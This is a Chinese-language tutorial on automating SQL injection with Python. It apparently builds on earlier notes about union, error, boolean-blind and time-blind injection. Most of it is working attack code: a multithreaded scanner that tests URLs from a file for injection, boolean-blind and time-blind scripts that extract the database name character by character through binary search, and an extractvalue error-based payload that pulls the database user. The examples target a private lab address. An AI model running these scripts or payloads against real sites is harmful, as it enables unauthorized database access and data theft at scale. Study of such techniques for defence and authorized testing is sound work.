批量化脚本编写思路

在理解了联合查询、报错注入、布尔盲注和时间盲注的原理后,我们需要利用编程语言(通常为 Python)来代替人工进行繁琐的穷举和发包。

编写批量化注入脚本通常遵循以下核心流程:

  1. 确定注入点与特征:找出 URL/POST 数据包中的可控参数,明确回显成功/失败的标志(布尔特征)或延时特征(时间特征)。
  2. 构造 Payload 模板:使用字符串格式化(如 {})将需要动态替换的部分(如猜测的字符、长度等)预留出来。
  3. 自动化发包与逻辑判断:利用循环或二分查找算法,不断向目标发送包含 Payload 的请求,并根据响应内容或响应时间提取数据。
  4. 并发与优化:针对批量 URL 扫描或深度数据提取,引入多线程/协程提升速度。

核心库使用

在 Python 中编写 SQL 注入脚本,以下几个标准库和第三方库是必备的:

1. requests 库(网络请求核心)

用于发送 HTTP 请求,支持 GET/POST、自定义 Headers、Cookies 和代理。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import requests

# 推荐使用 Session 保持连接池,提升发包速度
session = requests.Session()
# 设置统一的请求头伪造
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'}
# 发送带超时控制的请求(对时间盲注极度重要)
res = session.get(url, headers=headers, timeout=5)


## 2. `time` 库(时间控制与计算)

主要用于时间盲注中的响应时间判断。

Python

2. time 库(时间控制与计算)

主要用于时间盲注中的响应时间判断。

1
2
3
4
5
6
7
8
import time

start_time = time.time()
res = requests.get(url)
end_time = time.time()
# 计算请求耗时
if end_time - start_time > 5:
print("存在时间盲注!")

3. concurrent.futures 库(多线程/并发处理)

在批量扫描多个 URL,或者多字段同时爆破时,单线程效率极低,需要使用线程池。

1
2
3
4
5
6
7
8
9
10
from concurrent.futures import ThreadPoolExecutor

def check_sqli(url):
# 具体的检测逻辑
pass

urls = ["[http://test.com/?id=1](http://test.com/?id=1)", "[http://test.com/?id=2](http://test.com/?id=2)"]
# 开启 10 个线程并发执行
with ThreadPoolExecutor(max_workers=10) as executor:
executor.map(check_sqli, urls)

通用脚本模板

这是一个用于批量检测多个 URL 是否存在基础 SQL 注入的通用框架模板。包含了参数解析、请求重试、文件读取和多线程等工程化功能。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
import requests
import argparse
from concurrent.futures import ThreadPoolExecutor
from urllib.parse import urlparse

# 忽略 HTTPS 证书警告
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def verify_sqli(url):
"""
通用检测函数:测试简单的布尔/报错特征
"""
payloads = [
"' AND 1=1--+",
"' AND 1=2--+"
]

try:
# 测试正常页面
res_true = requests.get(url + payloads[0], timeout=5, verify=False)
# 测试异常页面
res_false = requests.get(url + payloads[1], timeout=5, verify=False)

# 基础的布尔判定逻辑:页面长度不同或者状态码不同
if len(res_true.text) != len(res_false.text):
print(f"[+] 发现疑似布尔盲注: {url}")
return url
except Exception as e:
pass
return None

def main():
parser = argparse.ArgumentParser(description="SQL Injection Batch Scanner")
parser.add_argument("-f", "--file", help="包含目标 URL 的文本文件", required=True)
parser.add_argument("-t", "--threads", help="线程数,默认 10", type=int, default=10)
args = parser.parse_args()

with open(args.file, 'r') as f:
urls = [line.strip() for line in f if line.strip()]

print(f"[*] 开始扫描,目标总数: {len(urls)},线程数: {args.threads}")

with ThreadPoolExecutor(max_workers=args.threads) as executor:
results = executor.map(verify_sqli, urls)

print("[*] 扫描完成!")

if __name__ == "__main__":
main()

专项实战例子

为了提高效率,强烈建议在盲注中使用二分查找法,而不是从 az 挨个遍历。

1. 布尔盲注利用脚本(结合二分法)

利用基础笔记中 1' and if(substring(database(),1,1)='g',1,0)-- 的原理。此处用字符的 ASCII 码进行大小比较,实现二分查找。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
import requests

url = "[http://192.168.110.1/?id=1](http://192.168.110.1/?id=1)"
# 页面正常时的标识特征(需要根据实际情况修改)
true_flag = "query success"

def get_db_length():
"""获取数据库名长度"""
for i in range(1, 30):
# 对应基础笔记:id=1' and length(database())=4 --+
payload = f"' and length(database())={i}--+"
target = url + payload
res = requests.get(target)
if true_flag in res.text:
print(f"[+] 数据库长度为: {i}")
return i
return 0

def get_db_name(length):
"""利用二分法获取数据库名"""
db_name = ""
for i in range(1, length + 1):
low = 32 # 可见字符 ASCII 下限
high = 126 # 可见字符 ASCII 上限

while low <= high:
mid = (low + high) // 2
# 对应基础笔记:id=1' and ascii(substring(database(),1,1))>97 --+
payload = f"' and ascii(substring(database(),{i},1))>{mid}--+"
target = url + payload
res = requests.get(target)

if true_flag in res.text:
# 页面正常,说明 ASCII 码大于 mid,区间右移
low = mid + 1
else:
# 页面异常,说明 ASCII 码小于等于 mid,区间左移
high = mid - 1

db_name += chr(low)
print(f"[*] 当前爆破进度: {db_name}")

print(f"[+] 最终数据库名为: {db_name}")

if __name__ == "__main__":
length = get_db_length()
if length > 0:
get_db_name(length)

2. 时间盲注利用脚本

对应基础笔记中 select if(length(database())>1,sleep(5),0) -- 的原理。时间盲注不依赖页面内容的变化,只关注请求的响应时间

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
import requests
import time

url = "[http://192.168.110.1/?id=1](http://192.168.110.1/?id=1)"
# 设定的延迟阈值
time_threshold = 4

def get_db_name_by_time(length=8):
db_name = ""
for i in range(1, length + 1):
low = 32
high = 126

while low <= high:
mid = (low + high) // 2
# 构造时间盲注 Payload
# 注意:时间盲注通常也会结合布尔逻辑的二分法
payload = f"' and if(ascii(substring(database(),{i},1))>{mid},sleep({time_threshold}),0)--+"
target = url + payload

try:
start_time = time.time()
requests.get(target, timeout=10) # 设置一个较大的 timeout 防止 requests 断开
end_time = time.time()

# 判断延时是否发生
if end_time - start_time >= time_threshold:
low = mid + 1
else:
high = mid - 1

except requests.exceptions.Timeout:
# 如果触发了 timeout 异常,也说明发生了延时
low = mid + 1

db_name += chr(low)
print(f"[*] 基于时间的爆破进度: {db_name}")

print(f"[+] 最终数据库名为: {db_name}")

if __name__ == "__main__":
get_db_name_by_time(length=8) # 假设已知长度为 8

3. 报错注入批量检测脚本

对应基础笔记中的 updatexml, extractvalue, 甚至数学溢出 exp(~(select * from (select user())a)) 等报错。报错注入的优势在于只需一次请求即可带出数据,无需逐字爆破。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
import requests
import urllib.parse
import re

def test_error_based(url):
print(f"[*] 正在测试报错注入: {url}")

# 将基础笔记中的报错 payload 进行 url 编码
# 使用 0x7e (~) 作为标志符包裹我们要查询的数据 (这里查的是 user())
raw_payload = "' AND (extractvalue(1,concat(0x7e,(select user()),0x7e)))--+"

# 因为 payload 里有空格、引号、加号等,直接拼接在 URL 后面容易被截断,所以要 URLEncode
payload = urllib.parse.quote(raw_payload)

target = f"{url}{payload}"

try:
# 发送请求,设置超时防止卡死
res = requests.get(target, timeout=5)

# 检查常见的 MySQL 报错特征或自定义的 0x7e(~) 回显
if "XPATH syntax error" in res.text or "~" in res.text:
print(f"[!] 确认存在报错注入!")

# 使用正则提取爆出的数据:匹配两个 ~ 之间的所有非 ~ 字符
# 正则表达式 r"~([^~]+)~" 的意思是:找一个 ~,接着捕获一堆不是 ~ 的字符,直到遇到下一个 ~
match = re.search(r"~([^~]+)~", res.text)

if match:
extracted_data = match.group(1)
print(f"[+] 成功提取数据: {extracted_data}")
else:
print("[-] 触发了报错,但未能通过正则精确提取数据。可能是因为页面过滤或回显格式不标准。")
# 打印前几百个字符辅助人工排查
# print(f"[*] 原始响应片段: {res.text[:500]}")
else:
print("[-] 未发现报错注入特征。")

except requests.exceptions.RequestException as e:
print(f"[-] 请求发生网络错误: {e}")

if __name__ == "__main__":
# 填入你要测试的目标 URL,注意 URL 结尾要留有准备拼接 payload 的参数位,例如 id=1
test_url = "http://192.168.110.1/?id=1"
test_error_based(test_url)